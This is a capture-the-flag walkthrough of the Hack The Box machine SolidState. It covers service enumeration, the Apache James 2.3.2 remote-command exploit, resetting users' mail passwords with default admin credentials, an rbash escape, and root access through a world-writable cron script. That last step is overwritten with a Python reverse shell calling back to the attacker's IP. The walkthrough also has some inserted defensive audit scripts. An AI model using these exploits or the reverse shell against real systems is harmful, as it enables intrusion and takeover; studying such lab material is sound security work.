Solid State HTB

(Image: SolidState Hack The Box info card)

ENUMERATION

NMAP

The scan returned multiple interesting services:

# nmap -p- -sV -sC --script vuln 10.10.10.51 -o solidstate.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 05:47 EDT

Nmap scan report for 10.10.10.51
Host is up (0.050s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

25/tcp   open  smtp        JAMES smtpd 2.3.2
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown: 
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.51
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.10.51:80/
|     Form id: name
|     Form action: #
|     
|     Path: http://10.10.10.51:80/index.html
|     Form id: name
|     Form action: #
|     
|     Path: http://10.10.10.51:80/services.html
|     Form id: name
|     Form action: #
|     
|     Path: http://10.10.10.51:80/about.html
|     Form id: name
|_    Form action: #
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /README.txt: Interesting, a readme.
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'
|_http-server-header: Apache/2.4.25 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
110/tcp  open  pop3        JAMES pop3d 2.3.2
|_sslv2-drown: 
119/tcp  open  nntp        JAMES nntpd (posting ok)
|_sslv2-drown: 
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 25 SMTP

An SMTP service is running. The pentestmonkey article on VRFY, EXPN and RCPT explains how to connect to the SMTP service on port 25 and test which of these user-enumeration commands it accepts.

# telnet 10.10.10.51 25
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Thu, 15 Apr 2021 06:22:00 -0400 (EDT)
VRFY
502 5.3.3 VRFY is not supported
EXPN
502 5.3.3 EXPN is not supported
RCPT
503 5.5.0 Need MAIL before RCPT

Since the server does not support the first two commands, we're going to use RCPT.

$ /usr/share/legion/scripts/smtp-user-enum.pl -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.10.10.51 
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... /usr/share/metasploit-framework/data/wordlists/unix_users.txt
Target count ............. 1
Username count ........... 168
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Thu Apr 15 06:23:54 2021 #########
######## Scan completed at Thu Apr 15 06:24:02 2021 #########
0 results.

168 queries in 8 seconds (21.0 queries / sec)

I also tried enumerating email addresses by adding "-D 10.10.10.51" and "-D solid-state-security.com", again without success. (If you think you know why, add a comment. Thanks!)
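As an added example that is not part of the writeup, here is a Python hardening check for the three enumeration vectors discussed above (VRFY, EXPN and RCPT), meant to be run against a mail server you administer. The offline part parses a telnet-style transcript of the shape shown above (the writeup's own session is embedded as a constructed sample) and turns the reply codes into a verdict; check_live repeats the same probes with the standard library's smtplib, including the comparison between a known and an unknown recipient that RCPT-mode tools such as smtp-user-enum rely on. The host, port, sender address and probe names are assumptions.

```python
import re
import smtplib

# Constructed sample: the telnet session from the writeup above, pasted verbatim.
SAMPLE_TRANSCRIPT = """\
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Thu, 15 Apr 2021 06:22:00 -0400 (EDT)
VRFY
502 5.3.3 VRFY is not supported
EXPN
502 5.3.3 EXPN is not supported
RCPT
503 5.5.0 Need MAIL before RCPT
"""

REPLY_LINE = re.compile(r"^(\d{3})[ -]")


def parse_transcript(text):
    """Pair each client command in a telnet-style transcript with the reply code that follows it."""
    replies = {}
    pending = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = REPLY_LINE.match(line)
        if m and pending is not None:
            replies[pending] = int(m.group(1))
            pending = None
        elif not m:
            pending = line.split()[0].upper()  # command verb only, e.g. 'VRFY'
    return replies


def verdict(code):
    """Interpret a VRFY/EXPN reply code as a hardening verdict."""
    if code in (500, 502):
        return "disabled"        # command not implemented: nothing to enumerate
    if code == 252:
        return "non-committal"   # 'cannot verify, but will accept': no per-name answer
    if code in (250, 550, 551, 553):
        return "enumerable"      # a definite yes/no per address confirms which names exist
    return "unexpected"


def assess(replies):
    """Verdicts for the enumeration commands present in a parsed transcript."""
    return {cmd: verdict(code) for cmd, code in replies.items() if cmd in ("VRFY", "EXPN")}


def rcpt_enumerable(code_known, code_unknown):
    """RCPT-based enumeration only works when known and unknown recipients get different replies."""
    return code_known != code_unknown


def check_live(host, port=25, known="postmaster", unknown="no-such-user-zz", timeout=10):
    """Run the same three checks against a mail server you administer (assumed reachable)."""
    with smtplib.SMTP(host, port, timeout=timeout) as smtp:
        smtp.ehlo_or_helo_if_needed()
        vcode, _ = smtp.verify(known)
        ecode, _ = smtp.expn(known)
        smtp.mail("audit@example.invalid")          # assumed sender for the RCPT probe
        kcode, _ = smtp.rcpt(f"{known}@{host}")
        ucode, _ = smtp.rcpt(f"{unknown}@{host}")
    return {"VRFY": verdict(vcode), "EXPN": verdict(ecode),
            "RCPT_enumerable": rcpt_enumerable(kcode, ucode)}


if __name__ == "__main__":
    print(assess(parse_transcript(SAMPLE_TRANSCRIPT)))
```

On the writeup's transcript the offline assessment reports VRFY and EXPN as disabled, which matches the 502 replies the author saw; the RCPT vector cannot be judged from that transcript because the server refused RCPT before MAIL, which is why check_live issues MAIL first and then compares two recipients.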

Port 80 HTTP

The nmap scan reveals a web service. Let's try to find hidden directories and files. The scan already reported some possibly interesting paths (/README.txt and /images/), but checking them turned up nothing important.

Dirbuster

sqlmap

I tested the JS false positive just for the sake of it and confirmed that it is not injectable.

Port 4555 JAMES Remote Admin

Searchsploit

We can't help but notice that two of the exploits target the exact version running on the machine, 2.3.2.

# searchsploit JAMES      
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                      |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache James Server 2.2 - SMTP Denial of Service                                    | multiple/dos/27915.pl
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)| linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution                                | linux/remote/35513.py
WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow                 | windows/remote/944.c
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploitation

Reading the RCE Python exploit (35513.py), it seems the default credentials for the remote administration tool are root:root. Let's test it:

$ python 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

Now, in order to execute the payload we need a way to log in to the machine. The James remote administration service is listening on port 4555 and we know the default credentials, root:root:

$ telnet 10.10.10.51 4555
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands

help
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection

listusers   
Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: root
user: thomas
user: john
user: mindy
user: mailadmin

setpassword mailadmin mailadmin
Password for mailadmin reset

exit
Unknown command exit

quit
Bye
Connection closed by foreign host.

Cool: I have logged onto the service using the default credentials, we know which users exist, and we can change their passwords. Note the account named ../../../../../../../../etc/bash_completion.d: that is the user the exploit created a moment ago ("Creating user..."), named so that mail delivered to it is written into /etc/bash_completion.d instead of the mail repository. Next I am going to access the mailadmin account, since it looks the juiciest.
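As an added example (not from the writeup and not part of the James project), here is a small Python audit of listusers output as produced by the James 2.3.2 remote administration tool. It parses the listing exactly as the session above shows it, flags any account name that contains a path traversal sequence or path separator (the account the exploit created is exactly such a name) and cross-checks the declared account count against the number of listed users. The sample input is the listing from this writeup, embedded as a constant; the safe-username pattern is an assumption about what a legitimate James account name should look like.

```python
import re

# Constructed sample: the 'listusers' output from the session above, verbatim.
SAMPLE_LISTUSERS = """\
Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: root
user: thomas
user: john
user: mindy
user: mailadmin
"""

# Assumption: a legitimate local account name is a short lowercase token with no path characters.
SAFE_USERNAME = re.compile(r"^[a-z0-9][a-z0-9._-]{0,63}$")


def parse_listusers(text):
    """Return (declared_count, usernames) from James 2.3.2 'listusers' output."""
    declared = None
    users = []
    for line in text.splitlines():
        line = line.strip()
        m = re.match(r"^Existing accounts (\d+)$", line)
        if m:
            declared = int(m.group(1))
        elif line.startswith("user: "):
            users.append(line[len("user: "):])
    return declared, users


def suspicious_users(users):
    """Flag account names that could make the mail repository write outside its own directory."""
    findings = []
    for name in users:
        reasons = []
        if "../" in name or "..\\" in name:
            reasons.append("path traversal sequence")
        elif "/" in name or "\\" in name:
            reasons.append("path separator")
        if not SAFE_USERNAME.match(name):
            reasons.append("does not match safe username pattern")
        if reasons:
            findings.append({"user": name, "reasons": reasons})
    return findings


def audit_listusers(text):
    """Full check: parse, flag suspicious names, and compare declared vs listed counts."""
    declared, users = parse_listusers(text)
    return {
        "declared": declared,
        "listed": len(users),
        "count_mismatch": declared is not None and declared != len(users),
        "findings": suspicious_users(users),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(audit_listusers(SAMPLE_LISTUSERS), indent=2))
```

Run against the listing above it reports a single finding, the bash_completion.d account, with both a traversal and a pattern reason; a listing with only ordinary names yields no findings. The same check can be pointed at a listusers capture taken from the admin port of a James instance you operate, which is a cheap way to notice that this exploit has already been used.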

  1. Credentials: mailadmin:mailadmin
  2. The client warns that the connection uses plain text and is not encrypted. Confirm and continue.
  3. Apparently the mailadmin account was a waste of time, lol :D. Let's repeat the process for the rest of the accounts (click "set up another account") and hope we get something out of it.
listusers
Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: root
user: thomas
user: john
user: mindy
user: mailadmin
setpassword mindy mindy
Password for mindy reset
  1. Mindy's mailbox contains a welcome email and an access email, which contains a password.

Upon logging in through SSH with the credentials mindy:[email protected][email protected], the payload planted by the Python exploit runs: the mail delivered to the traversal user was written as a file into /etc/bash_completion.d, which bash sources at login, so its headers even show up in the login output. However, we're put into a restricted rbash shell.

$ ssh [email protected]   

Received: from 10.10.14.5([10.10.14.5])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 902
          for <../../../../../../../../etc/[email protected]>;
          Thu, 15 Apr 2021 07:11:09 -0400 (EDT)
Date: Thu, 15 Apr 2021 07:11:09 -0400 (EDT)
From: [email protected]

$ whoami
-rbash: whoami: command not found

I finally managed to escape the restricted shell by adding "-t bash" to the ssh command. From the ssh man page:

$ man ssh
[...]
-t      Force pseudo-terminal allocation.  This can be used to execute arbitrary screen-based programs on a remote machine, which can be very useful, e.g. when implementing menu services.  Multiple -t options force tty allocation, even if ssh has no local tty.
[...]

$ ssh [email protected] -t bash

[email protected]'s password: 
${debian_chroot:+($debian_chroot)}[email protected]:~$ ls
bin  user.txt
${debian_chroot:+($debian_chroot)}[email protected]:~$ whoami
mindy

Privilege escalation

Enumeration

$ bash linenum.sh > output.txt

I did not find anything interesting apart from some open local ports. The next script I'd like to try is unix-privesc-check from pentestmonkey; however, the box did not have the strings binary, which that script requires to run.

Writable files/directories

$ find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null

-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py

$ cat tmp.py 
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

NICE! We have a root-owned, world-writable file that we can modify, and something executes it. Let's escalate. First I proved to myself that cron runs the file every minute by changing it to:

#!/usr/bin/env python
import os
import sys
try:
     os.system('touch /tmp/shell.py;python /tmp/shell.py')
except:
     sys.exit()

After a while, a file was created in /tmp/.
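An added example, not from the writeup: a Python audit that would have caught a file like /opt/tmp.py before anyone else did. It parses system-crontab lines (six schedule fields or an @shortcut, then the user the job runs as, then the command), resolves the file cron will actually execute (the script after an interpreter such as python, otherwise the first word), and reports targets that are world- or group-writable, not owned by the cron user, or sitting in a world-writable directory without the sticky bit. demo() builds a constructed fixture in a fresh temporary directory instead of touching the real crontab; the schedule lines, file names and the assumption that the root job ran once a minute are all made up for the demonstration.

```python
import os
import pwd
import stat
import tempfile

INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "dash", "perl"}


def parse_system_crontab(text):
    """Yield (cron_user, command) from /etc/crontab-style lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                # @hourly user command
            parts = line.split(None, 2)
            if len(parts) == 3:
                yield parts[1], parts[2]
            continue
        if not (line[0].isdigit() or line[0] in "*-"):
            continue                            # VAR=value lines
        parts = line.split(None, 6)             # m h dom mon dow user command
        if len(parts) == 7:
            yield parts[5], parts[6]


def command_target(command):
    """The file cron actually executes: the script after an interpreter, otherwise the first word."""
    words = command.split()
    if not words:
        return None
    if os.path.basename(words[0]) in INTERPRETERS:
        for word in words[1:]:
            if not word.startswith("-"):        # skip interpreter options such as -u
                return word
        return None
    return words[0]


def resolve_uid(user):
    """uid for a crontab user field; None if it cannot be resolved."""
    try:
        return pwd.getpwnam(user).pw_uid
    except KeyError:
        return int(user) if user.isdigit() else None


def file_problems(path, cron_user):
    """Ways a user other than the cron user could change what this job runs."""
    st = os.stat(path)
    problems = []
    if st.st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    if st.st_mode & stat.S_IWGRP:
        problems.append("group-writable")
    expected_uid = resolve_uid(cron_user)
    if expected_uid is not None and st.st_uid != expected_uid:
        problems.append(f"owned by uid {st.st_uid}, not by cron user {cron_user}")
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        problems.append("parent directory world-writable without sticky bit")
    return problems


def audit_crontab(text):
    """One finding per cron entry whose target file someone other than the cron user could tamper with."""
    findings = []
    for cron_user, command in parse_system_crontab(text):
        target = command_target(command)
        if not target or not os.path.isabs(target) or not os.path.isfile(target):
            continue                            # relative paths would need a PATH lookup; out of scope
        problems = file_problems(target, cron_user)
        if problems:
            findings.append({"cron_user": cron_user, "path": target,
                             "command": command, "problems": problems})
    return findings


def demo():
    """Constructed fixture: a root job running a mode-0777 script (as with /opt/tmp.py above) beside a
    correctly permissioned job owned by the current user. Nothing here touches the real crontab."""
    workdir = tempfile.mkdtemp()                # mode 0700, so the parent-directory check passes
    bad = os.path.join(workdir, "tmp.py")
    good = os.path.join(workdir, "cleanup.py")
    for path in (bad, good):
        with open(path, "w") as fh:
            fh.write("#!/usr/bin/env python\nprint('housekeeping')\n")
    os.chmod(bad, 0o777)
    os.chmod(good, 0o755)
    try:
        me = pwd.getpwuid(os.getuid()).pw_name
    except KeyError:
        me = str(os.getuid())
    crontab = (f"* * * * * root python {bad}\n"       # assumed schedule for the writeup's file
               f"@hourly {me} python3 -u {good}\n")   # assumed benign job for contrast
    return audit_crontab(crontab)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point audit_crontab at the contents of /etc/crontab (and the files under /etc/cron.d) on a host you administer; the finding for the writeup's file would read "world-writable" and "group-writable" for a root job, which is precisely the condition that made the escalation above possible.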

I then edited the file to hold the Python reverse shell from sentrywhale's website:

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.5",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Catch the shell with a listener:

$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.51] 39694
bash: cannot set terminal process group (3597): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~# ls
ls
file.py
root.txt
